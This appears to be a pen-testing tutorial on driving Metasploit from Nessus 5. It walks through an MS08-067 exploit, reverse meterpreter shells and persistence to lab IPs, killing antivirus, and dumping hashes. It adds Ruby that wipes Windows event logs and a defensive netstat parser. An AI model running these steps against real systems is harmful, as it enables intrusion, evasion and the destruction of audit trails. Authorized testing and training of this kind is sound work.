Penetration testing and shell tossing with Metasploit
Pen Test Tips
The Metasploit Framework [1] is a penetration testing toolkit, exploit-development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. By mixing and matching payloads, encoders, and NOP slide generators [2] with exploit modules, you can solve almost any exploit-related task.
In previous articles, I introduced you to the Metasploit environment, the tools that professional attackers use [3], and how intruders hide malicious files from virus scanners [4]. In this article, I will walk you through using the latest version of Nessus, with its pre-built plugin filter for the Metasploit Framework, in your penetration testing. You will get a glimpse of how pen testers use Metasploit to probe and penetrate a real-world system. I will also cover some useful meterpreter tips for post-exploitation and for keeping hold of a compromised box. For instance, wouldn't it be great to have a shell on another computer just in case you lose your meterpreter shell?
Integrating Nessus 5 with Metasploit
With the release of Nessus 5, the configuration and vulnerability scanning tool from Tenable Network Security, users get better filtering, analysis, and reporting, as well as faster scans. The Metasploit Exploit Framework filter in Nessus lets you select only those checks that cover vulnerabilities for which a working exploit module exists in the Metasploit Framework.
To start, go to the Tenable site [5], download Nessus 5, and install it. The new installation will reside in /opt/nessus and will install over the top of any previous Nessus version. Start the nessus daemon and open your web browser to https://localhost:8834, then log in, go to Policies, and click Add (see Figure 1). Give your policy a title and click Next. On the Credentials page, leave the default settings and click Next at the bottom.
The Plugins page lets you add a filter. A drop-down list presents many different options; choose Metasploit Exploit Framework, make sure the operator is set to "is equal to" and the value to "true", and click Save (see Figure 2). Next, disable all plugins, select the plugin family you want to enable, and click Enable Plugins in the upper-right corner of the pane. Do this for every family you want to enable, then click Submit at the bottom.
To begin a scan, click on Scans. Name the scan and choose a type: run now, scheduled, or template. In the Policy drop-down, pick the policy you created earlier, then select a target. Now you can start the scan; because only the filtered checks run, the time required will be surprisingly brief. Afterward, you receive a report that lists the Plugin ID, Count, Severity, Name, and Family of each check that matched the Metasploit Framework filter (see Figure 3).
The Name column tells you which Metasploit exploits have the best chance of succeeding against the system you are testing.
To drive a scan from the Metasploit Framework itself, start msfconsole and load the Nessus plugin with the command:
msf > load nessus
Once the plugin is loaded, connect to the Nessus server. The trailing ok accepts the server's self-signed SSL certificate; note that the password typed here ends up in your msfconsole history.
msf > nessus_connect cr0wn:password@localhost ok
Now list the available scan policies with the nessus_policy_list command (see Figure 4).
You can use a policy to scan the network with the nessus_scan_new command, giving the policy ID, a name for the scan, and a target IP address or range. For example, the command
nessus_scan_new 5 windozxp 10.10.3.219
will target a single Windows XP box with the IP address 10.10.3.219 (Figure 5).
If msfconsole is connected to a database, you can pull the scan results into it and view them from the console; otherwise, you can view them in the Nessus web interface.
Now you can select an exploit to use on the target system. Suppose I want to use the MS08-067 flaw to get a meterpreter shell on the target computer. To accomplish this, I do the following:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 10.10.3.218
msf > set lport 5555
msf > set rhost 10.10.3.188
msf > exploit
meterpreter >
Useful meterpreter Commands
Now that I have a meterpreter shell on the Windows box, I have a number of options. For instance, I can check whether the target computer is a virtual machine or has an antivirus program running. I can also see what the local subnet looks like and what kind of security configuration is on the victim's system. Metasploit ships meterpreter scripts for each of these tasks. To check for a virtual machine, run checkvm:
meterpreter > run checkvm
The next command shows the help menu for the getcountermeasure script, with its options:
meterpreter > run getcountermeasure -h
Choose -d to disable the built-in Windows firewall:
meterpreter > run getcountermeasure -d
To kill most antivirus programs, run the killav script. Keep in mind that killav and getcountermeasure -d both change the state of the target in ways a defender will notice, and that you will need to document and undo them when the engagement ends:
meterpreter > run killav
To identify the local subnets the victim is on, run get_local_subnets:
meterpreter > run get_local_subnets
You might want to search the host for interesting information, such as files of a given type (*.pdf, *.txt, *.doc, *.jpg, and so on). To do so, use the search command in meterpreter:
meterpreter > search -h
meterpreter > search -f *.pdf
To get detailed information about the system, use the winenum and scraper scripts. The winenum script runs a long list of local enumeration commands and dumps tokens and password hashes, providing you with lots of information (see Figure 6). The scraper script pulls down registry and system information:
meterpreter > run winenum
meterpreter > run scraper
Now I want to clear the event logs. To do this, I open the meterpreter scripting shell with the irb command and issue the following commands at the >> prompt:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log = client.sys.eventlog.open('system')
>> log.clear
While I'm at it, I'll clear the security log and the application log as well, by changing system in the preceding commands to security and application. Two caveats: clearing the Security log requires an administrative token, and Windows records the clearing itself as an audit event (ID 1102 on Vista and later, 517 on XP/2003), so a defender who forwards events off the box will still see that the log was wiped.
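The three logs can be cleared in one step from the same irb shell. The following Ruby is an added example, not code from the article or from Metasploit itself. It assumes that the object returned by client.sys.eventlog.open also responds to length and close, as the real stdapi EventLog class does; the FakeClient at the bottom is a constructed stand-in so the example runs outside a live session.

```ruby
# Added example (not from the article or the Metasploit code base).
# clear_event_logs is meant to be pasted into the meterpreter 'irb' shell,
# where 'client' is the live Meterpreter client. Assumption: the object from
# client.sys.eventlog.open(name) responds to #length, #clear and #close, as
# the real stdapi EventLog class does.

# Clear each named log and report what happened per log:
#   :cleared, :already_empty, or an error string (e.g. access denied).
def clear_event_logs(client, names = %w[system security application])
  results = {}
  names.each do |name|
    log = nil
    begin
      log = client.sys.eventlog.open(name)
      before = log.length
      log.clear
      results[name] =
        if log.length != 0 then "#{log.length} records remain"
        elsif before.zero?  then :already_empty
        else :cleared
        end
    rescue StandardError => e
      # Typical cause: clearing the Security log without an admin/SYSTEM token.
      results[name] = "error: #{e.message}"
    ensure
      log&.close
    end
  end
  results
end

# --- Constructed stand-in for 'client', so the example runs outside a session ---
class FakeEventLog
  attr_reader :closed
  def initialize(records, deny: false)
    @records, @deny, @closed = records, deny, false
  end
  def length; @records; end
  def clear
    raise 'Access is denied.' if @deny
    @records = 0
  end
  def close; @closed = true; end
end

class FakeEventLogApi
  def initialize(logs); @logs = logs; end
  def open(name); @logs.fetch(name) { raise "The specified log does not exist: #{name}" }; end
end

FakeSys = Struct.new(:eventlog)

class FakeClient
  def initialize(logs); @api = FakeEventLogApi.new(logs); end
  def sys; FakeSys.new(@api); end
end

# A target with 1200 System records, a Security log we are not allowed to
# clear (simulating a low-privilege token), and an empty Application log.
def demo_client
  FakeClient.new(
    'system'      => FakeEventLog.new(1200),
    'security'    => FakeEventLog.new(800, deny: true),
    'application' => FakeEventLog.new(0)
  )
end

p clear_event_logs(demo_client) if $PROGRAM_NAME == __FILE__
# => {"system"=>:cleared, "security"=>"error: Access is denied.", "application"=>:already_empty}
```

Inside a real session, call clear_event_logs(client) and read the returned hash: an error string against security is the usual sign that you still need getsystem or a stolen admin token before the wipe will succeed.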
Being able to shove a meterpreter shell to the team members with whom you are performing a pen test is valuable. This option had not presented itself to me until I took a class on Industrial Control Systems Advanced Cybersecurity given by US-CERT [6]. I would recommend the class to anyone working in the realm of ICS/SCADA systems. One day included a 12-hour exercise in which participants attacked (red team) or defended (blue team). I was on the red team, and being able to throw meterpreter shells to my fellow red team members was helpful. In the rest of this article, I'll show you a few ways to throw a meterpreter shell.
In the first example, I use the meterpreter script persistence (to see a list of options, use the -h switch):
meterpreter > run persistence -h
meterpreter > run persistence -X -i 5 -p 5555 -r 10.10.3.180
The preceding command throws a meterpreter session to the remote system 10.10.3.180 (-r), retrying every five seconds (-i 5), on port 5555 (-p 5555); the -X switch installs the payload as a registry autorun entry so that it starts again every time the machine boots. Because persistence drops a script on disk and modifies the registry, record what it installs and remove it when the engagement ends. The recipient waits for the meterpreter shell with the multi/handler module, using the same payload, address, and port:
msf > use multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lhost 10.10.3.180
msf > set lport 5555
msf > exploit
The second example is a bit stealthier: it injects your meterpreter shell into an existing process. Running the ps command from within your meterpreter shell lists the running processes. Look through the list and identify a process that will not draw attention, such as IEXPLORE.EXE with PID 3664 (see Figure 7).
Injecting the meterpreter shell into the IEXPLORE.EXE process would be stealthy. I'll run the multi_meter_inject script with the following switches:
meterpreter > run multi_meter_inject -pt windows/meterpreter/reverse_tcp -mr 10.10.3.180 -p 3664
This command throws a meterpreter session to the remote system 10.10.3.180 (-mr) on port 3664 (-p). Note that -p is the port the handler listens on, not a process ID: the process to inject into is named with the script's separate -pid switch, and without it the script starts a new hidden process to host the payload. The recipient waits for the meterpreter shell with multi/handler as before, with lport changed to 3664.
Now, when performing some basic analysis on the victim's box, you can run tasklist and nothing looks out of place (see Figure 8), but when you run the netstat -an command, you will see the foreign connection (Figure 9).
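From the defender's side, that netstat check is easy to script. The following Ruby is an added example, not from the article; it goes beyond the article's netstat -an by using netstat -ano, so each connection carries the owning PID, and then joins that against tasklist output to name the process behind every established connection on a port outside a small expected set. Both command outputs below are constructed samples shaped like the real Windows output, and the expected-port list is an assumption to tune for the network being watched.

```ruby
# Added example (not from the article): correlate Windows 'netstat -ano' and
# 'tasklist' output to list established connections, with the owning process,
# on ports that are not ordinary web/DNS traffic. Both samples are constructed.

NETSTAT = <<~TXT
  Active Connections

    Proto  Local Address          Foreign Address        State           PID
    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       888
    TCP    10.10.3.188:139        0.0.0.0:0              LISTENING       4
    TCP    10.10.3.188:1034       10.10.3.180:3664       ESTABLISHED     3664
    TCP    10.10.3.188:1041       10.10.3.180:5555       ESTABLISHED     1720
    TCP    10.10.3.188:1052       93.184.216.34:443      ESTABLISHED     3664
    UDP    0.0.0.0:445            *:*                                    4
TXT

TASKLIST = <<~TXT
  Image Name                     PID Session Name        Session#    Mem Usage
  ========================= ======== ================ =========== ============
  System Idle Process              0 Services                   0         24 K
  System                           4 Services                   0        236 K
  svchost.exe                    888 Services                   0      4,880 K
  iexplore.exe                  3664 Console                    1     22,340 K
  notepad.exe                   1720 Console                    1      3,112 K
TXT

# Parse 'tasklist' into { pid => image name }. Image names may contain spaces,
# so anchor on the trailing numeric columns rather than splitting on whitespace.
def parse_tasklist(text)
  text.each_line.with_object({}) do |line, map|
    next unless (m = line.match(/\A(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*\z/))
    map[m[2].to_i] = m[1].strip
  end
end

# Parse 'netstat -ano' into connection hashes. Only TCP rows carry a state.
def parse_netstat(text)
  text.each_line.map do |line|
    f = line.split
    next unless f[0] == 'TCP' && f.size == 5
    lhost, lport = f[1].rpartition(':').values_at(0, 2)
    rhost, rport = f[2].rpartition(':').values_at(0, 2)
    { local: lhost, lport: lport.to_i, remote: rhost, rport: rport.to_i,
      state: f[3], pid: f[4].to_i }
  end.compact
end

# Assumed "normal" destination ports; tune per network.
EXPECTED_PORTS = [80, 443, 53].freeze

# ESTABLISHED connections to unexpected ports, each tagged with its process name.
def suspicious_connections(netstat_text, tasklist_text, expected = EXPECTED_PORTS)
  procs = parse_tasklist(tasklist_text)
  parse_netstat(netstat_text)
    .select { |c| c[:state] == 'ESTABLISHED' && !expected.include?(c[:rport]) }
    .map { |c| c.merge(image: procs.fetch(c[:pid], 'unknown')) }
end

if $PROGRAM_NAME == __FILE__
  suspicious_connections(NETSTAT, TASKLIST).each do |c|
    puts format('%-14s pid %-5d -> %s:%d', c[:image], c[:pid], c[:remote], c[:rport])
  end
end
```

On the sample data this reports iexplore.exe (PID 3664) talking to 10.10.3.180:3664 and notepad.exe talking to 10.10.3.180:5555, while the browser's connection to port 443 is ignored. A browser process holding a connection to a high, non-web port is exactly the artifact the injected session leaves behind, and the hidden notepad.exe with a network connection is what multi_meter_inject produces when no PID is given.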
A third way to send off meterpreter shells is the meterpreter script duplicate. At the meterpreter prompt, issue:
meterpreter > run duplicate -h
This shows the available options, and the following command sends a meterpreter shell to the IP address 10.10.3.180 on the script's default port of 4546 (Figure 10):
meterpreter > run duplicate -r 10.10.3.180
Once your team member has obtained a meterpreter shell, you can also run a packet sniffer on the target system. The meterpreter script for this is packetrecorder, which gives you more control when capturing packets:
meterpreter > run packetrecorder
To determine which interface to listen on, issue run packetrecorder -li, which lists the target's network interfaces. Then pass the chosen interface number to -i and a directory on your own machine for the capture files to -l; the script writes a new capture file at each interval:
meterpreter > run packetrecorder -i -l /home/tmp/
[*] Packet capture interval is 30 Seconds
You can then review the file later with Wireshark or tcpdump.